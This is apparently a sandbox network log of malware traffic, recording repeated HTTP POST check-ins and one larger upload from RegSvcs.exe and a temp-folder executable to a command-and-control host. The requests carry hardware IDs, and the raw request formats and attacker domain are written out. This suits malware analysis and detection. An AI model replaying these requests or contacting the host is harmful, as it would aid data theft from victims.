Dec 27, 2023 17:58:06.772286892 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=rlfsbf90jksa8s88iio2au79kp; expires=Sun, 21-Apr-2024 10:44:45 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:06 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6VhxLWdhywxEmdySJCh0wL7T1RMlC3OC2pbYUaZ5gXmou2%2FWaeYS5AfGgsWdAGiUc7e%2FixaMocSZxzpIkDP8Ziy%2BjAGX4nPV50HE7RaZOdq2%2FCknAjVBeYXzwRDUw2IbXWL2Qtk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b3d5 Data Raw: Data Ascii:
Dec 27, 2023 17:58:06.772334099 CET	41	IN	Data Raw: 34 65 33 30 36 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 4e3066-DFW15Malformed packet data
Dec 27, 2023 17:58:06.772346973 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49800	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:06.973001003 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:06.973066092 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:07.506741047 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=sdplm3bue0g6fg1bjb8pv42v8b; expires=Sun, 21-Apr-2024 10:44:46 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:07 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4pD2UfjnbZs%2FZHrJQPr0Ud5GquIc2vis%2BfnkmETfN3Uwa5QU0Zk1KeYithFotnBWCzkufBv1o6JvL9wY%2FbyLRphf0X28N1liv52So8Xkgj6H9quQd3naCyVdKJLDOfFCdSKmUTg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b41fde Data Raw: Data Ascii:
Dec 27, 2023 17:58:07.506755114 CET	39	IN	Data Raw: 34 36 30 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 460c-DFW15Malformed packet data
Dec 27, 2023 17:58:07.506764889 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49802	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:08.049382925 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:08.049436092 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:08.436316013 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=boftlm623f7qh4m2ovn29oheqr; expires=Sun, 21-Apr-2024 10:44:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TxxtttKUy7%2BrZf1JOAc5AwgHL5r2sLuipcJwQQZgiBxqq550BhJHcKFi815ZQl%2B6MPEH576U%2BQ6ZVMT1%2FeIA706IpceqasOqJozzWeQEkOjMfZxhUdtNV3WcYbtLSO8gwyyMGCE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b48b Data Raw: Data Ascii:
Dec 27, 2023 17:58:08.436327934 CET	41	IN	Data Raw: 39 35 36 62 33 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 956b33-DFW15Malformed packet data
Dec 27, 2023 17:58:08.436341047 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49803	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:08.736444950 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:08.736675978 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:09.123728991 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=l2asogvucjt45chh8jc1cemlmm; expires=Sun, 21-Apr-2024 10:44:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WY%2FD4zIGrkhhJIzvKJkCPdmpQYOKvS%2FvVRzNBJHszr1wGdFmwyKuFyJvn5O1RURR4nlmhzEbFdx6zr%2BpM32cD%2FjOYyE2Y%2BJnsu1s5QXcA8SUBTL8eyWCIQSZVPVPF90eijSRPUQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b4 Data Raw: Data Ascii:
Dec 27, 2023 17:58:09.123755932 CET	43	IN	Data Raw: 30 64 65 37 36 62 39 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 0de76b9d-DFW15Malformed packet data
Dec 27, 2023 17:58:09.123769999 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49804	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:08.823050976 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:08.823340893 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:09.203486919 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=6eb83rcv68r9nuujgo23m9l2i8; expires=Sun, 21-Apr-2024 10:44:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nwv3WdNpXY%2BBMpOk5aUM%2Fl0n4CLs2luGCDOKIHkPmoQKnmioFwGC1%2BTa04Cma03R%2FI4xbfwmZjog%2Fy%2BNPah9aGo6bhvsGzbrVXYhWPXup0Ms%2FlKwSNkPdSoSc9dHWnxfcK3%2BSWM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:09.203507900 CET	49	IN	Data Raw: 63 33 31 62 34 64 38 38 38 61 36 62 65 30 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: c31b4d888a6be0-DFW15Malformed packet data
Dec 27, 2023 17:58:09.203521013 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49806	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:09.568196058 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:09.568670034 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:09.945065975 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=hiinf1aihf4mnrkcc5l6r8mfov; expires=Sun, 21-Apr-2024 10:44:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LKMj%2Fw3rsFxeawb%2FOxRE4RSbBmrJ3bYbdJ6nSlQWlG0vp9cocfNNF4eZrEhyGp5M8dTpw%2B9A0Y0pcPewFnpDkqc2z21Cvc1NMMF5mjjXMZ%2BSM%2BjMPKjGmM8GjrHCru09i9Y8H0E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b5 Data Raw: Data Ascii:
Dec 27, 2023 17:58:09.945079088 CET	43	IN	Data Raw: 33 66 62 31 34 36 31 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3fb14611-DFW15Malformed packet data
Dec 27, 2023 17:58:09.945090055 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49805	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:09.581262112 CET	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 9598 Host: soupinterestoe.fun
Dec 27, 2023 17:58:09.581351995 CET	9598	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:10.124500990 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=1mlk4o1hsejb8ohjp3rooqmhdu; expires=Sun, 21-Apr-2024 10:44:48 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:09 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7eFQcvjyVTgJo6CeMmu9mvWeKMSXMgJ1xelEd03o0TVPv73y9NeHL6W6JpgHkj51gHkFXSEDePZsr3iKXSycbs9IrWucxuLkWrNQkxsx3n3jeP6uIr2vfB%2Fu3EgjaHp76r0KH6w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b524df0e7f Data Raw: Data Ascii:
Dec 27, 2023 17:58:10.124520063 CET	28	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: -DFWfok 212.102.41.2
Dec 27, 2023 17:58:10.124530077 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49807	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:10.566557884 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:10.686089039 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:11.209564924 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=eq1bt2dbukl4r71rhamsrea0ue; expires=Sun, 21-Apr-2024 10:44:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RJd%2FNlBx21%2F33%2F%2BbwUDZBXK7gKmiphhGMPUSZ9VUSY%2FoIr7LrD1ys0PEdnD5LZUQj2brQ6pwBmlobi87stcMdDP36KRpHUahkxO9WazYTdj1CxyuNI1L6NTEYSm3O3GE%2BKzEzGg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:11.209578037 CET	45	IN	Data Raw: 35 38 37 66 32 37 65 61 65 65 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 587f27eaee-DFW15Malformed packet data
Dec 27, 2023 17:58:11.209588051 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49809	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:11.543085098 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:11.543165922 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:12.070830107 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=91mtlchj658iis8njdrp840mik; expires=Sun, 21-Apr-2024 10:44:50 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:11 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HRnBmeYQwoO83cv2Fdczhe41JwcKYSuKlFJkhUdBYFhtF9ptsX313%2FuWKe%2BFMgza5lfrDMizH9AjtpPaTGOoMFjTV7SUapwVQQqGMA9%2BlCz61X%2BmA0FVaQFqCvvy8KzWuzxRaFw%3D"}],"group":"cf-nel","max_age":604800} NEL: 